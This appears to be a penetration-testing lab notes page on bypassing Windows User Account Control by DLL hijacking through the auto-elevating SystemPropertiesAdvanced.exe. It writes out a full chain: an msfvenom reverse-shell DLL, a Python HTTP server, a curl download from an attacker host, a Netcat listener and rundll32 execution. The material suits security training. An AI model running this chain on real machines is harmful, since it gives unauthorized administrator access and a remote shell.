14.User-account-control
whoami command to check current user information
whoami /userList members of the administrators group
net localgroup administratorsDisplay the privileges of the current user
whoami /privQuery registry to check if UAC is enabled
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUAQuery registry for administrator consent prompt behavior
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdminGet the OS version using PowerShell
[environment]::OSVersion.VersionPrint the PATH environment variable
cmd /c echo %PATH%List tasks and filter for rundll32 processes
# Useful to identify suspicious rundll32 usage
tasklist /svc | findstr "rundll32"Kill a process by specifying its PID
# Replace <pid> with the actual process ID
taskkill /PID <pid> /FGenerate a reverse TCP shell DLL using msfvenom
# Replace <attacker_ip> and <attacker_port> with actual values
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f dll > srrstr.dllStart a Python HTTP server to host the DLL payload
python3 -m http.server <port>Download the DLL file from the attacker's server using curl
curl http://<attacker_ip>:<port>/srrstr.dll -O "C:\\Users\\<user>\\AppData\\Local\\Microsoft\\WindowsApps\\srrstr.dll"Set up Netcat listener to capture the reverse shell
nc -lvnp <attacker_port>Execute the DLL payload using rundll32
rundll32 shell32.dll,Control_RunDLL C:\\Users\\<user>\\AppData\\Local\\Microsoft\\WindowsApps\\srrstr.dllOpen advanced system properties dialog
C:\\Windows\\SysWOW64\\SystemPropertiesAdvanced.exeConfirm the current user after potential privilege escalation
whoamiKey Concepts:
UAC Functionality:
UAC prompts for elevation when applications require administrator privileges.
It separates standard user and administrator tokens.
It is a security convenience, not a security boundary.
UAC Bypass:
Leveraging vulnerabilities or unintended behavior in Windows binaries.
DLL hijacking is a common technique.
SystemPropertiesAdvanced.exe is a auto elevating binary.
DLL Hijacking:
Placing a malicious DLL in a directory where a trusted binary searches for it.
Windows DLL search order is critical.
Approach, Commands, Tools, and Techniques:
UAC and User Information Gathering:
whoami /user(Check current user).net localgroup administrators(Verify admin group membership).whoami /priv(Review user privileges).REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA(Check if UAC is enabled).REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin(Check UAC level).[environment]::OSVersion.Version(PowerShell: Check Windows version).cmd /c echo %PATH%(Review PATH environment variable).tasklist /svc | findstr "rundll32"(List running rundll32 processes).taskkill /PID <pid> /F(Kill rundll32 processes).
Malicious DLL Generation and Transfer:
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f dll > srrstr.dll(Generate malicious DLL).python3 -m http.server <port>(Start HTTP server).curl http://<attacker_ip>:<port>/srrstr.dll -O "C:\Users\<user>\AppData\Local\Microsoft\WindowsApps\srrstr.dll"(Download DLL).
Listener Setup:
nc -lvnp <attacker_port>(Start Netcat listener).
Testing and Exploitation:
rundll32 shell32.dll,Control_RunDLL C:\Users\<user>\AppData\Local\Microsoft\WindowsApps\srrstr.dll(Test DLL execution).C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe(Execute vulnerable binary).
Verification:
whoami(Verify elevated privileges).whoami /priv(Verify elevated privileges).
Commands:
whoaminet localgroup administratorsREG QUERYcmd /c echo %PATH%tasklisttaskkillmsfvenompython3 -m http.servercurlncrundll32
Tools:
msfvenom(Metasploit)nc(Netcat)
Techniques:
UAC bypass.
DLL hijacking.
Exploiting auto-elevating binaries.
Key Considerations:
Windows version and build number are critical for UAC bypass selection.
DLL search order.
Attacker controlled IP addresses and Ports.
Process cleanup.
Last updated